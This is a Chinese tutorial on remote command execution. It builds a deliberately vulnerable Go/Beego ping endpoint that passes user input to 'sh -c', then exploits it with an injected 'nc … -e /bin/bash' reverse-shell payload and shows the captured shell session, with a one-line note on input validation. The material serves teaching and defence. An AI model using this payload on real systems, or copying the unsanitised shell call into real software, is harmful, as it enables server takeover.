rce简介
远程命令执行 英文名称:RCE (remote code execution) ,简称RCE漏洞,是指用户通过浏览器提交执行命令。
原因:由于服务器端没有针对执行函数做过滤而执行一个恶意构造的代码或者程序。
RCE利用
编写web后端服务
$ go get -u github.com/beego/beego/v2
$ go get -u github.com/beego/bee/v2
$ cd $GOPATH/src
$ bee api hello
$ cd hello
$ touch controllers/ping.go
package controllers
import (
"bufio"
"bytes"
"fmt"
"io"
"os/exec"
beego "github.com/beego/beego/v2/server/web"
)
// Operations about Ping
type PingController struct {
beego.Controller
}
const SHELL_CMD_EXEC_FAILED = "shell cmd exec failed"
// ShellCmdExec exec shell command
func ShellCmdExec(commandName string, params []string) (string, bool) {
var ret_str string
cmd := exec.Command(commandName, params...)
fmt.Println("cmd:", cmd.Args)
stdout, err := cmd.StdoutPipe()
if err != nil {
fmt.Println("cmd stdoutpipe err:", err)
return SHELL_CMD_EXEC_FAILED, false
}
if err := cmd.Start(); err != nil {
fmt.Println("cmd start err:", err)
return SHELL_CMD_EXEC_FAILED, false
}
var stderr bytes.Buffer
cmd.Stdout = &stderr
cmd.Stderr = &stderr
reader := bufio.NewReader(stdout)
for {
ret, err := reader.ReadString('\n')
ret_str += ret
if err != nil && io.EOF != err {
fmt.Println("cmd read string err:", err)
return SHELL_CMD_EXEC_FAILED, false
}
if io.EOF == err {
break
}
}
if err := cmd.Wait(); err != nil {
fmt.Println("cmd wait err:", err, stderr.String())
return ret_str, false
}
return ret_str, true
}
// @Title Ping
// @Description Ping
// @Param ip query string true "The ip for ping"
// @Success 200 {string} ping success
// @router /ping [get]
func (u *PingController) Ping() {
ip := u.GetString("ip")
cmd := fmt.Sprintf("ping -c 3 %s", ip)
var param = []string{"-c", cmd}
ret, _ := ShellCmdExec("sh", param)
u.Data["json"] = map[string]string{"Result": ret}
u.ServeJSON()
}
$vi routers/router.go
添加如下路由
beego.NSNamespace("/nettools",
beego.NSInclude(
&controllers.PingController{},
),
),
$ go mod tidy
$ bee run -gendoc=true -downdoc=true
$ curl -X GET “http://192.168.11.112:8888/v1/nettools/ping?ip=192.168.11.1” -H “accept: application/json”
nc反弹
$ nc -l -v -p 9999
$ curl -X GET “http://192.168.11.112:8888/v1/nettools/ping?ip=192.168.11.1%3Bnc%20192.168.11.102%209999%20-e%20%2Fbin%2Fbash” -H “accept: application/json”
//实际运行命令为ping -c 3 192.168.11.1;nc 192.168.11.102 9999 -e /bin/bash,在nc服务端即可输入pwd等系统命令,控制web所在的linux服务器
[xiaofeng@localhost ~]$ nc -l -v -p 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.11.112.
Ncat: Connection from 192.168.11.112:60154.
pwd
/home/xiaofeng/src/hello
rce防御
对入参进行严格检查,防止命令注入